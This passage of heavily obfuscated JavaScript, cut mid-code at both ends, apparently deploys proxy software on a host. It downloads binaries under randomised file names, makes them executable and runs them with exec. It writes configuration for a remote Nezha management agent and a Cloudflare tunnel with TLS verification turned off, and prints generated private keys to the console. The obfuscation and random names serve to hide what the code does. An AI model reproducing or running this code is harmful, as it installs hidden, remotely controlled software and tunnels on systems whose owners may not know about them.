_0xa9d7da[_0x24ae9f(_0x41c2a0._0x6d10d3,_0x41c2a0._0x598c16,0x484,_0x41c2a0._0x3cbccf)](_0x363404[_0x489636(_0x41c2a0._0x443c97,_0x41c2a0._0x388d0a,_0x41c2a0._0x38d46d,0x5ac)],_0xa9d7da[_0x489636(_0x41c2a0._0x23e001,_0x41c2a0._0x2d325c,_0x41c2a0._0x14b465,0x681)])?_0xa9d7da[_0x489636(_0x41c2a0._0x11dc30,_0x41c2a0._0x4fdb60,0x4b4,_0x41c2a0._0xce9eeb)](_0xa9d7da[_0x24ae9f(_0x41c2a0._0x3e81b3,_0x41c2a0._0x3d3977,_0x41c2a0._0x7b2a2e,_0x41c2a0._0x5b26d5)],_0xa9d7da['jnpMi'])?_0x401335['TOioZ'](_0xc5c8a4,_0x3f3b67)&&_0x7d4149[_0x489636(_0x41c2a0._0x893b51,_0x41c2a0._0x4c2c00,_0x41c2a0._0x1bcbaf,_0x41c2a0._0x49bb6b)][_0x489636(_0x41c2a0._0x17cd58,_0x41c2a0._0xe95587,_0x41c2a0._0x2546fa,_0x41c2a0._0x53e762)]({'tag':_0x401335[_0x489636(_0x41c2a0._0x2d325c,_0x41c2a0._0x10388d,_0x41c2a0._0x441d41,_0x41c2a0._0x480cb9)],'type':_0x401335['kZLmh'],'listen':'::','listen_port':_0x401335['hqhpl'](_0x41345b,_0x351b04),'users':[{'uuid':_0x1cb5e3,'flow':_0x401335['whIVi']}],'tls':{'enabled':!![],'server_name':_0x401335[_0x489636(_0x41c2a0._0x18daaf,_0x41c2a0._0x541373,0x4ca,_0x41c2a0._0x1d68fc)],'reality':{'enabled':!![],'handshake':{'server':_0x401335[_0x24ae9f(_0x41c2a0._0x47b03e,_0x41c2a0._0x1fe376,0x473,0x340)],'server_port':0x1bb},'private_key':_0x13e5c3,'short_id':['']}}}):_0x2c1ce6=phpRandomName:_0x2c1ce6=_0x363404[_0x24ae9f(_0x41c2a0._0x419774,_0x41c2a0._0x25ccfe,_0x41c2a0._0x1ac5c7,_0x41c2a0._0x2918de)];}}const _0x407ec2={..._0x363404};return _0x407ec2['fileName']=_0x2c1ce6,_0x407ec2;}}),_0x468fd2=_0x1c592b[_0x4cbbd7(_0x3e5dc7._0x57a319,-_0x3e5dc7._0x3918d0,_0x3e5dc7._0x48481f,-_0x3e5dc7._0x143276)](_0x3ed483=>{const _0x2d9977={_0x3ed90c:0x362,_0x3df60e:0x27b,_0x54645c:0x387,_0x5f0dad:0x452,_0x513921:0x3d9,_0x527818:0x373,_0x3852f0:0x164,_0x311e82:0x112,_0x24473d:0x234,_0x1e3547:0x20a,_0x51f8f9:0xbb,_0x340adc:0x335,_0x4408a7:0x2e8,_0x131988:0x3f0,_0x40a2bf:0x1dd,_0xf9f3af:0x451,_0x3b120d:0x5b6,_0x1166cd:0x347},_0xa0b170={_0x3dacd3:0x261,_0xf814d9:0x128,_0x2954ae:0x7},_0x2ccf69={_0x451c59:0x1ed,_0xfdcde7:0x155,_0x3b83a8:0x38},_0x55086d={_0x5b5ea2:0x17f,_0x41a726:0xc};function _0x3a02bf(_0x48aae1,_0x2047f5,_0x31cc97,_0x2f53ff){return _0x12ee7c(_0x48aae1-0x5d,_0x2047f5-_0x55086d._0x5b5ea2,_0x2f53ff,_0x31cc97- -_0x55086d._0x41a726);}function _0x434685(_0x1f3da1,_0x36d3a1,_0x526513,_0x293867){return _0x12ee7c(_0x1f3da1-_0x2ccf69._0x451c59,_0x36d3a1-_0x2ccf69._0xfdcde7,_0x293867,_0x1f3da1- -_0x2ccf69._0x3b83a8);}const _0x3d55d4={'uVmXU':_0xa9d7da[_0x434685(_0x30c1c0._0xe8a0c9,0x309,0x2f7,_0x30c1c0._0x41b4a1)],'yrVuc':function(_0x2ef104,_0x1b2df8){return _0x2ef104(_0x1b2df8);},'xBQBG':_0x434685(_0x30c1c0._0x360533,_0x30c1c0._0x13e19f,_0x30c1c0._0xd2a033,0x124),'ECSDl':function(_0x5b05d0,_0x2c6745){return _0xa9d7da['mACTd'](_0x5b05d0,_0x2c6745);}};if(_0xa9d7da[_0x3a02bf(0x1ad,_0x30c1c0._0x1836ee,_0x30c1c0._0x50e8a5,_0x30c1c0._0x3093d4)](_0xa9d7da[_0x3a02bf(_0x30c1c0._0xd72526,_0x30c1c0._0x11b76f,_0x30c1c0._0xe8a0c9,_0x30c1c0._0x1dcaa4)],'ipsgX'))_0xa9d7da[_0x3a02bf(0x2a1,_0x30c1c0._0x35f997,_0x30c1c0._0x272c4e,_0x30c1c0._0x53b26e)](_0x23d301,_0x3d643d);else return new Promise((_0x18da35,_0x2936fa)=>{const _0x1dba8={_0x517069:0x64,_0x14cbd7:0x2a6},_0x48eb55={_0x405e30:0x3f8,_0x53f095:0x33,_0x5c9e61:0x1f1};function _0xb720d8(_0x93fa6d,_0x2a0230,_0x1c9201,_0x29412a){return _0x434685(_0x29412a-_0xa0b170._0x3dacd3,_0x2a0230-_0xa0b170._0xf814d9,_0x1c9201-_0xa0b170._0x2954ae,_0x1c9201);}function _0x4785c1(_0x10a070,_0x4ef1c8,_0xba8510,_0x3eac22){return _0x434685(_0x4ef1c8-_0x48eb55._0x405e30,_0x4ef1c8-_0x48eb55._0x53f095,_0xba8510-_0x48eb55._0x5c9e61,_0x10a070);}_0xa9d7da[_0x4785c1(0x5b6,_0x4da4fd._0x49a9de,_0x4da4fd._0x4bd31e,_0x4da4fd._0x1887ef)](downloadFile,_0x3ed483[_0xb720d8(0x55c,_0x4da4fd._0xaa44b8,_0x4da4fd._0x2048d5,_0x4da4fd._0x4b5958)],_0x3ed483[_0x4785c1(_0x4da4fd._0x1eaaa4,0x5d1,_0x4da4fd._0x31f13e,_0x4da4fd._0x1768f0)],(_0x11a732,_0x235771)=>{const _0x5b7aba={_0x2b9294:0xb4,_0x266ae3:0x38},_0x5c9191={};function _0xaea408(_0x508c2e,_0x5df8fe,_0xb57f8f,_0xf9064e){return _0xb720d8(_0x508c2e-_0x1dba8._0x517069,_0x5df8fe-0x12e,_0xb57f8f,_0x508c2e- -_0x1dba8._0x14cbd7);}function _0x115f94(_0x59c2e0,_0x5e947e,_0x578d74,_0x5554c3){return _0x4785c1(_0x5554c3,_0x59c2e0- -0x34e,_0x578d74-_0x5b7aba._0x2b9294,_0x5554c3-_0x5b7aba._0x266ae3);}_0x5c9191[_0xaea408(_0x2d9977._0x3ed90c,_0x2d9977._0x3df60e,_0x2d9977._0x54645c,_0x2d9977._0x5f0dad)]=_0x3d55d4['uVmXU'];const _0x10a7d3=_0x5c9191;if(_0x11a732)_0x3d55d4[_0xaea408(0x365,_0x2d9977._0x513921,_0x2d9977._0x527818,0x3e2)](_0x2936fa,_0x11a732);else{if(_0x3d55d4['xBQBG']!==_0xaea408(_0x2d9977._0x3852f0,_0x2d9977._0x311e82,_0x2d9977._0x24473d,0x61))_0x3d55d4[_0x115f94(_0x2d9977._0x1e3547,0x2bf,_0x2d9977._0x51f8f9,_0x2d9977._0x340adc)](_0x18da35,_0x235771);else{_0x4b1021[_0xaea408(_0x2d9977._0x4408a7,_0x2d9977._0x131988,0x3ad,_0x2d9977._0x40a2bf)](_0x10a7d3[_0x115f94(_0x2d9977._0xf9f3af,_0x2d9977._0x3b120d,0x476,_0x2d9977._0x1166cd)]);return;}}});});});try{await Promise[_0x4cbbd7(0xad,_0x3e5dc7._0x3e0a80,0xe5,-0xb7)](_0x468fd2);}catch(_0x5d89b1){if(_0xa9d7da['ASHyg']===_0xa9d7da[_0x4cbbd7(0xe0,_0x3e5dc7._0x263273,-_0x3e5dc7._0x2bdb7d,-_0x3e5dc7._0x2e6608)]){console['error'](_0xa9d7da[_0x4cbbd7(_0x3e5dc7._0x16ae7d,_0x3e5dc7._0x1275d7,-0x2b,_0x3e5dc7._0x405cdf)],_0x5d89b1);return;}else{const _0x3f18f4={};_0x3f18f4[_0x4cbbd7(0x0,_0x3e5dc7._0x2ead5b,0x138,-_0x3e5dc7._0x4dbed5)]=_0xa9d7da[_0x12ee7c(_0x3e5dc7._0x4a414d,0x53e,_0x3e5dc7._0x369e3c,_0x3e5dc7._0x4349d2)],_0x3f18f4[_0x12ee7c(0xbb,_0x3e5dc7._0x24781d,0x2fa,0x211)]=_0xa9d7da[_0x4cbbd7(_0x3e5dc7._0x4bdee2,0x183,0x26,0xfc)];const _0x475faf={};_0x475faf[_0x4cbbd7(_0x3e5dc7._0x401a75,_0x3e5dc7._0x2ead5b,_0x3e5dc7._0x9834ad,-_0x3e5dc7._0x2102f4)]=_0xa9d7da['svsPU'],_0x475faf[_0x12ee7c(_0x3e5dc7._0x31fd32,_0x3e5dc7._0x5007ab,_0x3e5dc7._0x3e48d0,0x211)]=_0xa9d7da[_0x4cbbd7(_0x3e5dc7._0x4dd738,_0x3e5dc7._0x44cafc,0x135,_0x3e5dc7._0xca6000)],_0xa4887a=[_0x3f18f4,_0x475faf];}}function _0x23206f(_0x34aec0){const _0x4094be={_0x53ad48:0x1ca,_0x2bd215:0x592,_0x1917dd:0x458,_0x2a6e3c:0x121,_0x2b4040:0x1c8,_0x309d91:0x51,_0x3b21dd:0x305},_0x12398f={_0xcaa7c1:0x4d,_0x25c3e2:0xd9,_0x399d53:0x192},_0x23b6dd={_0x5b1dba:0x30};function _0x3d6bb4(_0x4cfc21,_0xbfcd5b,_0x187451,_0x5c2aa5){return _0x4cbbd7(_0x4cfc21-0x15a,_0x187451- -_0x842064._0x125d9f,_0x4cfc21,_0x5c2aa5-_0x842064._0xf959f6);}const _0x4a0cf1={};_0x4a0cf1[_0x551e77(_0x1d8bc2._0x20938d,_0x1d8bc2._0x1461b7,_0x1d8bc2._0x24e292,_0x1d8bc2._0x263618)]=_0xa9d7da[_0x3d6bb4(-_0x1d8bc2._0x31d4ba,-_0x1d8bc2._0xe80e59,_0x1d8bc2._0x483691,-_0x1d8bc2._0x42091d)];function _0x551e77(_0x1c4cc6,_0x12b867,_0x344181,_0x3a7b74){return _0x12ee7c(_0x1c4cc6-_0x6fa979._0x5085f5,_0x12b867-_0x6fa979._0x4a33e0,_0x344181,_0x12b867-0xa7);}const _0xc64ceb=_0x4a0cf1;if(_0xa9d7da['JsDDT'](_0xa9d7da[_0x3d6bb4(-_0x1d8bc2._0x4a8d98,-_0x1d8bc2._0xb26109,-_0x1d8bc2._0x99d1b0,-0x16b)],_0xa9d7da['OIxGt'])){const _0x4068cf=-0x4e+0x30b*0x7+0x6*-0x32b;_0x34aec0[_0x551e77(_0x1d8bc2._0xc5305a,_0x1d8bc2._0x25d092,_0x1d8bc2._0x27255c,_0x1d8bc2._0x2dad4d)](_0x49d578=>{const _0x1ece96={_0x595b97:0x1e1,_0x2f0de1:0x276,_0x27c6ab:0x1b6,_0x7e0b9:0x67,_0x3ec54c:0x89,_0x523e4a:0xb0,_0x1f6e54:0x71,_0x5bf09f:0x9e,_0x17d736:0x88,_0x4b4938:0x102,_0x460a14:0x13,_0x1870c7:0x1ef,_0x4dadcf:0x186,_0x31c9e2:0xed,_0x33a539:0xf9,_0x5d7313:0x26,_0x310724:0x1e6,_0x27ba78:0xfb,_0x56181e:0x1d5,_0x4f7083:0x35f,_0x986d15:0x1bd,_0x2b923f:0x2f6,_0x12d2b7:0x351,_0x70b264:0x23f,_0x1996f3:0x2dc,_0x7542d1:0x172,_0x544a9c:0x2e5,_0x513dea:0x22f,_0x31ea95:0x2f1,_0xf49f23:0x1e0,_0x623d3d:0x1f7,_0x8109a9:0x361,_0x54985a:0x21b,_0x1909cf:0x2af,_0xe0e4f0:0x375,_0x46016d:0xb,_0x361f49:0x3f,_0x47b796:0x108},_0x52af2c=path[_0x2dbc59(0x128,0x18f,_0x4094be._0x53ad48,0x1fb)](FILE_PATH,_0x49d578);function _0x5ce9c6(_0x238f1a,_0x40eea7,_0x229a1b,_0x1c6147){return _0x551e77(_0x238f1a-0x1b0,_0x40eea7- -_0x23b6dd._0x5b1dba,_0x1c6147,_0x1c6147-0x1a7);}function _0x2dbc59(_0x5789a7,_0x8010c1,_0x3f5543,_0xac6f60){return _0x3d6bb4(_0x8010c1,_0x8010c1-_0x12398f._0xcaa7c1,_0x5789a7-_0x12398f._0x25c3e2,_0xac6f60-_0x12398f._0x399d53);}fs[_0x5ce9c6(_0x4094be._0x2bd215,_0x4094be._0x1917dd,0x44f,0x324)](_0x52af2c)&&fs[_0x5ce9c6(_0x4094be._0x2a6e3c,_0x4094be._0x2b4040,_0x4094be._0x309d91,_0x4094be._0x3b21dd)](_0x52af2c,_0x4068cf,_0x37bf1e=>{const _0x1f9cdf={_0x2bfca3:0x100,_0x2d332f:0xc1},_0x5e64ae={_0x323b6c:0xac,_0x2fb488:0x115,_0x26d5e1:0x11};function _0x153fac(_0x271542,_0x5ca210,_0x39d4b8,_0x52a0d6){return _0x5ce9c6(_0x271542-_0x5e64ae._0x323b6c,_0x39d4b8- -_0x5e64ae._0x2fb488,_0x39d4b8-_0x5e64ae._0x26d5e1,_0x5ca210);}const _0x1fd185={};_0x1fd185[_0x5775bc(_0x1ece96._0x595b97,_0x1ece96._0x2f0de1,_0x1ece96._0x27c6ab,0xe4)]=_0x5775bc(-_0x1ece96._0x7e0b9,-_0x1ece96._0x3ec54c,_0x1ece96._0x523e4a,-_0x1ece96._0x1f6e54);function _0x5775bc(_0x2cb1de,_0x36e4ab,_0x2b2645,_0x51a8d1){return _0x5ce9c6(_0x2cb1de-0x35,_0x2b2645- -_0x1f9cdf._0x2bfca3,_0x2b2645-_0x1f9cdf._0x2d332f,_0x51a8d1);}const _0x316fe7=_0x1fd185;_0xc64ceb[_0x5775bc(_0x1ece96._0x5bf09f,_0x1ece96._0x17d736,_0x1ece96._0x4b4938,_0x1ece96._0x460a14)]===_0xc64ceb[_0x153fac(_0x1ece96._0x1870c7,_0x1ece96._0x4dadcf,_0x1ece96._0x31c9e2,_0x1ece96._0x33a539)]?_0x37bf1e?console[_0x5775bc(_0x1ece96._0x5d7313,_0x1ece96._0x310724,_0x1ece96._0x27ba78,_0x1ece96._0x56181e)](_0x5775bc(_0x1ece96._0x4f7083,_0x1ece96._0x986d15,_0x1ece96._0x2b923f,_0x1ece96._0x12d2b7)+_0x52af2c+':\x20'+_0x37bf1e):console[_0x5775bc(_0x1ece96._0x70b264,0x278,_0x1ece96._0x1996f3,_0x1ece96._0x7542d1)](_0x5775bc(_0x1ece96._0x544a9c,_0x1ece96._0x513dea,_0x1ece96._0x31ea95,0x454)+_0x52af2c+':\x20'+_0x4068cf[_0x153fac(_0x1ece96._0xf49f23,_0x1ece96._0x623d3d,0x218,_0x1ece96._0x8109a9)](0x3a2*-0xa+-0x1594+0x39f0)):_0x2792e6='tunnel\x20--edge-ip-version\x20auto\x20--config\x20'+_0x1171f6[_0x5775bc(_0x1ece96._0x54985a,0x31a,_0x1ece96._0x1909cf,_0x1ece96._0xe0e4f0)](_0xec0987,_0x316fe7['YzuuC'])+_0x153fac(-_0x1ece96._0x46016d,-_0x1ece96._0x361f49,_0x1ece96._0x47b796,-_0x1ece96._0x46016d);});});}else try{if(_0xa9d7da[_0x3d6bb4(_0x1d8bc2._0x57144d,-_0x1d8bc2._0x387ed0,-_0x1d8bc2._0x37b82b,-_0x1d8bc2._0x74e3a2)](_0x1faf84,null)||_0xa9d7da[_0x3d6bb4(0x62,_0x1d8bc2._0x5f43b7,0x9b,_0x1d8bc2._0x455345)](_0xc8bce,_0x40ff76)||_0x374ffe==='')return![];if(typeof _0x1698d8===_0xa9d7da[_0x3d6bb4(-_0x1d8bc2._0x479164,_0x1d8bc2._0x5bbd30,-0x93,-_0x1d8bc2._0x174891)]&&_0xa9d7da[_0x3d6bb4(_0x1d8bc2._0x5767f6,-_0x1d8bc2._0x2c8d65,0x14,-_0x1d8bc2._0xba7283)](_0xf9773f[_0x551e77(_0x1d8bc2._0x7028bb,0x482,_0x1d8bc2._0x5b9839,_0x1d8bc2._0x2c3b94)](),''))return![];const _0x33f882=_0xa9d7da[_0x3d6bb4(-_0x1d8bc2._0x1fc1b5,-_0x1d8bc2._0x5bdcd7,0x9,-_0x1d8bc2._0x388791)](_0x43f44c,_0x5a8750);if(_0xa9d7da[_0x3d6bb4(_0x1d8bc2._0x5e30e0,-_0x1d8bc2._0x3c4912,_0x1d8bc2._0x42b8d3,_0x1d8bc2._0x5eec45)](_0x528120,_0x33f882))return![];if(_0x33f882<-0x26*0xcd+0x9*-0x419+-0xc*-0x59c||_0xa9d7da['LgBGp'](_0x33f882,0x1922*0x10+-0x20f6*-0x5+-0x1*0x136ef))return![];return!![];}catch(_0x519b0d){return![];}}function _0x12ee7c(_0x4d1801,_0x43a4b3,_0xa6375c,_0x47f146){return _0x33ccd3(_0x4d1801-_0x3c5865._0x54744b,_0x47f146- -_0x3c5865._0x595bb7,_0xa6375c-_0x3c5865._0x7b8d11,_0xa6375c);}const _0x54ab2b=NEZHA_PORT?[npmRandomName,webRandomName,botRandomName]:[phpRandomName,webRandomName,botRandomName];_0xa9d7da['PSlbG'](_0x23206f,_0x54ab2b);function _0x4cbbd7(_0x2854fe,_0x34ac28,_0x43607e,_0x370596){return _0x33ccd3(_0x2854fe-_0x141013._0x31a3ab,_0x34ac28- -_0x141013._0x3186b2,_0x43607e-_0x141013._0xf38f44,_0x43607e);}const _0x1ba295=NEZHA_SERVER[_0x12ee7c(_0x3e5dc7._0x3bf2c0,0x22d,_0x3e5dc7._0x31fd32,_0x3e5dc7._0x4fd6f6)](':')?NEZHA_SERVER[_0x4cbbd7(_0x3e5dc7._0x4c9887,_0x3e5dc7._0x3a05b8,0x5b,_0x3e5dc7._0x12af83)](':')[_0x12ee7c(_0x3e5dc7._0x1434d0,_0x3e5dc7._0x295d4b,_0x3e5dc7._0x55208a,_0x3e5dc7._0x1536d4)]():'',_0x955fba=new Set([_0xa9d7da[_0x12ee7c(0x2d1,_0x3e5dc7._0x253628,_0x3e5dc7._0x1c9af1,_0x3e5dc7._0xa12745)],_0xa9d7da[_0x12ee7c(_0x3e5dc7._0x1dbba4,0x21c,_0x3e5dc7._0x20dc3f,_0x3e5dc7._0x466b31)],_0xa9d7da[_0x12ee7c(0x20f,_0x3e5dc7._0x45da7f,_0x3e5dc7._0x514315,_0x3e5dc7._0x37d4b4)],_0x12ee7c(_0x3e5dc7._0x39a47f,_0x3e5dc7._0x1be863,0x353,_0x3e5dc7._0x53677c),_0xa9d7da[_0x4cbbd7(_0x3e5dc7._0x44b823,_0x3e5dc7._0x56aad0,-_0x3e5dc7._0x1dbba4,_0x3e5dc7._0x3dcca2)],_0xa9d7da[_0x4cbbd7(_0x3e5dc7._0x4f9576,0x14b,_0x3e5dc7._0x402f35,0x1c4)]]),_0x1ecd56=_0x955fba[_0x12ee7c(_0x3e5dc7._0x545f04,_0x3e5dc7._0x53165a,_0x3e5dc7._0x48f637,_0x3e5dc7._0x56615c)](_0x1ba295)?_0xa9d7da[_0x12ee7c(_0x3e5dc7._0x476daf,_0x3e5dc7._0x3bed6f,_0x3e5dc7._0x505960,_0x3e5dc7._0x2550d5)]:_0xa9d7da[_0x12ee7c(_0x3e5dc7._0x2263b5,_0x3e5dc7._0xd155b7,0x26d,0x37e)];if(_0xa9d7da[_0x4cbbd7(_0x3e5dc7._0x30ea0b,_0x3e5dc7._0x3b5c96,_0x3e5dc7._0x15a877,0x1d1)](NEZHA_SERVER,NEZHA_KEY)){if(_0xa9d7da[_0x4cbbd7(-0xc7,-_0x3e5dc7._0x401a75,_0x3e5dc7._0x55388c,-_0x3e5dc7._0x35d592)](_0xa9d7da[_0x12ee7c(0xd7,_0x3e5dc7._0x4459b8,_0x3e5dc7._0x523a2a,0x15a)],_0x12ee7c(0xc4,_0x3e5dc7._0x67e86a,_0x3e5dc7._0x3950bc,_0x3e5dc7._0x40669f))){if(!NEZHA_PORT){const _0x4451ec=_0x4cbbd7(_0x3e5dc7._0x1bfd95,_0x3e5dc7._0x3f24fb,_0x3e5dc7._0x159750,0x37)+NEZHA_KEY+_0x4cbbd7(-_0x3e5dc7._0x372c2e,-_0x3e5dc7._0x48997d,-0x7f,-_0x3e5dc7._0xd1859d)+NEZHA_SERVER+_0x12ee7c(_0x3e5dc7._0x4796a0,_0x3e5dc7._0x4c9fe1,_0x3e5dc7._0x12747d,_0x3e5dc7._0x22a288)+_0x1ecd56+'\x0ause_gitee_to_upgrade:\x20false\x0ause_ipv6_country_code:\x20false\x0auuid:\x20'+UUID;fs[_0x12ee7c(_0x3e5dc7._0x3950bc,_0x3e5dc7._0x20a3cb,0x43d,_0x3e5dc7._0x545f04)](path[_0x12ee7c(_0x3e5dc7._0x3ceb29,0x411,0x392,_0x3e5dc7._0xe4b93e)](FILE_PATH,_0xa9d7da['hYXtL']),_0x4451ec);}}else _0x58bc93[_0x4cbbd7(_0x3e5dc7._0x4f98cb,_0x3e5dc7._0x43c63f,0x2d8,_0x3e5dc7._0x2d0324)][_0x12ee7c(_0x3e5dc7._0x428839,_0x3e5dc7._0x5a7589,0x4e7,0x3a5)](_0xa9d7da[_0x12ee7c(_0x3e5dc7._0x40669f,0xc1,_0x3e5dc7._0x4314f3,0x1b3)]);}const _0x42dd88=path[_0x4cbbd7(_0x3e5dc7._0x38ed29,_0x3e5dc7._0x407855,0x2b,_0x3e5dc7._0x227c48)](FILE_PATH,_0xa9d7da[_0x12ee7c(_0x3e5dc7._0x556b27,_0x3e5dc7._0x59f720,_0x3e5dc7._0x51abad,_0x3e5dc7._0x3baf4e)]);if(fs[_0x4cbbd7(_0x3e5dc7._0x165610,0x20b,_0x3e5dc7._0x4a31cd,_0x3e5dc7._0x3b43e4)](_0x42dd88)){if(_0xa9d7da[_0x12ee7c(0x44b,_0x3e5dc7._0x4fd6f6,_0x3e5dc7._0x4ee75e,_0x3e5dc7._0x12b540)](_0xa9d7da[_0x12ee7c(_0x3e5dc7._0x578d60,_0x3e5dc7._0x274916,-_0x3e5dc7._0x457039,_0x3e5dc7._0xe11c23)],_0xa9d7da['mYOpQ'])){if(!_0x2b6034||!_0x371357){_0x97d03b['log'](_0x4cbbd7(_0x3e5dc7._0x474e77,_0x3e5dc7._0x5ecec4,_0x3e5dc7._0x220dea,0x62));return;}if(_0x348b34[_0x4cbbd7(0xce,_0x3e5dc7._0x59d275,-_0x3e5dc7._0x4d8d6c,0x17a)](_0xa9d7da[_0x4cbbd7(-_0x3e5dc7._0x5ecec4,0xa0,-_0x3e5dc7._0x3a05b8,_0x3e5dc7._0x244b10)])){_0x37093a[_0x12ee7c(0x372,_0x3e5dc7._0x92acdd,_0x3e5dc7._0x46768d,0x2dd)](_0x37e69d[_0x12ee7c(_0x3e5dc7._0x2ed182,0x210,_0x3e5dc7._0x2e16c6,0x338)](_0x3183f7,'tunnel.json'),_0x6bc676);const _0x5d7ad9='\x0a\x20\x20tunnel:\x20'+_0x824713[_0x12ee7c(_0x3e5dc7._0x3eccf3,_0x3e5dc7._0x1be863,0x26a,_0x3e5dc7._0x1d7124)]('\x22')[0xcf8+0x1cfa+-0x29e7]+_0x12ee7c(_0x3e5dc7._0x1910bc,0x1a7,_0x3e5dc7._0x2ba56a,_0x3e5dc7._0x4d2f92)+_0x55c208[_0x4cbbd7(0x61,0x162,_0x3e5dc7._0x32ef3c,0x277)](_0x8dc78a,_0xa9d7da[_0x4cbbd7(-_0x3e5dc7._0x1f1bac,_0x3e5dc7._0x39ac48,0x89,-_0x3e5dc7._0x2f9932)])+'\x0a\x20\x20protocol:\x20http2\x0a\x20\x20\x0a\x20\x20ingress:\x0a\x20\x20\x20\x20-\x20hostname:\x20'+_0x3b8f41+_0x4cbbd7(0x106,-_0x3e5dc7._0x605813,-_0x3e5dc7._0x2091f8,-_0x3e5dc7._0x507c61)+_0x154b16+'\x0a\x20\x20\x20\x20\x20\x20originRequest:\x0a\x20\x20\x20\x20\x20\x20\x20\x20noTLSVerify:\x20true\x0a\x20\x20\x20\x20-\x20service:\x20http_status:404\x0a\x20\x20';_0x2645b9[_0x12ee7c(0x21f,_0x3e5dc7._0x307a6a,_0x3e5dc7._0x3fb33,0x2dd)](_0x126838['join'](_0x368d56,_0xa9d7da[_0x4cbbd7(-_0x3e5dc7._0x44cafc,-0x55,-_0x3e5dc7._0x212620,-_0x3e5dc7._0x3e3f3f)]),_0x5d7ad9);}else _0x4b799b[_0x12ee7c(_0x3e5dc7._0x435fb2,_0x3e5dc7._0x2d719a,0x36c,0x365)]('ARGO_AUTH\x20mismatch\x20TunnelSecret,use\x20token\x20connect\x20to\x20tunnel');}else{const _0x28deaa=fs[_0x12ee7c(0x405,_0x3e5dc7._0x42e189,0x46c,0x363)](_0x42dd88,_0xa9d7da[_0x4cbbd7(_0x3e5dc7._0x22cc5e,-0x54,-_0x3e5dc7._0xc61e,-_0x3e5dc7._0xaf3a80)]),_0x29dcd0=_0x28deaa[_0x12ee7c(0x322,_0x3e5dc7._0x2427b8,_0x3e5dc7._0x46fee0,_0x3e5dc7._0x1074f8)](/PrivateKey:\s*(.*)/),_0x3dab94=_0x28deaa[_0x12ee7c(_0x3e5dc7._0x3026be,_0x3e5dc7._0x2084a5,_0x3e5dc7._0x47a37b,_0x3e5dc7._0x1074f8)](/PublicKey:\s*(.*)/);privateKey=_0x29dcd0?_0x29dcd0[-0x1bde+-0x32c*-0x1+-0x1*-0x18b3]:'',publicKey=_0x3dab94?_0x3dab94[0x21ff+0xd8c+0x4c1*-0xa]:'';if(_0xa9d7da[_0x12ee7c(_0x3e5dc7._0x125f18,_0x3e5dc7._0x1cc743,0x392,_0x3e5dc7._0x1afeed)](!privateKey,!publicKey)){console[_0x12ee7c(0xe6,0x88,0x27f,0x184)](_0xa9d7da['PYJfJ']);return;}console[_0x12ee7c(0x2e8,_0x3e5dc7._0x1f4ce1,_0x3e5dc7._0x31381d,_0x3e5dc7._0x459c82)](_0xa9d7da['ZHxWZ'],privateKey),console['log'](_0xa9d7da[_0x4cbbd7(0x19f,_0x3e5dc7._0x293c39,-_0x3e5dc7._0x4f0b96,-_0x3e5dc7._0x4d2344)],publicKey),_0xa9d7da[_0x4cbbd7(_0x3e5dc7._0x54c821,0xd8,-_0x3e5dc7._0x143276,_0x3e5dc7._0x4f1eec)](_0x541889);}}else exec(path[_0x12ee7c(0x452,_0x3e5dc7._0x2e6f38,_0x3e5dc7._0x1bc38e,0x338)](FILE_PATH,webRandomName)+_0x4cbbd7(0x20,-_0x3e5dc7._0x105f55,_0x3e5dc7._0x174c74,_0x3e5dc7._0x302176),async(_0x483f90,_0x40f040,_0x5bc2f0)=>{if(_0x483f90){console['error'](_0x23e78c(_0x4c0950._0x1f0a50,_0x4c0950._0x10babf,_0x4c0950._0xff44d9,_0x4c0950._0x1b1a35)+_0x483f90['message']);return;}const _0x2b6fff=_0x40f040[_0x23e78c(_0x4c0950._0x523e67,_0x4c0950._0x50cabd,_0x4c0950._0x53f22a,_0x4c0950._0x785743)](/PrivateKey:\s*(.*)/),_0xea9a76=_0x40f040[_0x23e78c(_0x4c0950._0xe59334,_0x4c0950._0x480a76,_0x4c0950._0x4b864a,_0x4c0950._0x67eb4f)](/PublicKey:\s*(.*)/);privateKey=_0x2b6fff?_0x2b6fff[-0x1c5*0xb+-0x6*-0x5de+0x26*-0x6a]:'',publicKey=_0xea9a76?_0xea9a76[0x26b7+0x1*-0x64c+-0x206a]:'';if(_0xa9d7da[_0x23e78c(0x63f,_0x4c0950._0x2b7c71,_0x4c0950._0x33f3f0,_0x4c0950._0x4e3e98)](!privateKey,!publicKey)){console[_0x2e3a19(0x3d2,0x225,_0x4c0950._0x4b9624,0x25f)](_0xa9d7da[_0x2e3a19(_0x4c0950._0x25e31b,0x219,0x359,0x37a)]);return;}fs['writeFileSync'](_0x42dd88,_0x23e78c(0x7b6,_0x4c0950._0x5f514f,_0x4c0950._0x5bf1a7,0x55b)+privateKey+_0x2e3a19(_0x4c0950._0x1b6189,_0x4c0950._0xea1155,_0x4c0950._0x477236,_0x4c0950._0x53bbc0)+publicKey+'\x0a',_0x2e3a19(0x40d,0x40f,_0x4c0950._0x51bfd8,_0x4c0950._0x17b049)),console['log'](_0xa9d7da[_0x2e3a19(_0x4c0950._0x1c6e10,_0x4c0950._0x2a91f2,_0x4c0950._0x296b4f,_0x4c0950._0x4563da)],privateKey),console[_0x23e78c(_0x4c0950._0x4c1429,_0x4c0950._0x413687,_0x4c0950._0xe281da,_0x4c0950._0x470b0b)]('Public\x20Key:',publicKey);function _0x23e78c(_0x77c4fe,_0x1b08cf,_0x2ba2cb,_0x1d57c8){return _0x4cbbd7(_0x77c4fe-_0x49dcac._0x68d64d,_0x2ba2cb-_0x49dcac._0x1eaf8e,_0x1d57c8,_0x1d57c8-_0x49dcac._0x4bbef8);}function _0x2e3a19(_0x530659,_0x24522d,_0x2f277a,_0x3581c5){return _0x12ee7c(_0x530659-_0x58f01f._0xd91104,_0x24522d-_0x58f01f._0x2bf01e,_0x24522d,_0x3581c5-_0x58f01f._0x2a89d7);}_0xa9d7da[_0x23e78c(0x5b7,_0x4c0950._0x5b6133,_0x4c0950._0x26b5be,_0x4c0950._0x2992d1)](_0x541889);});function _0x541889(){const 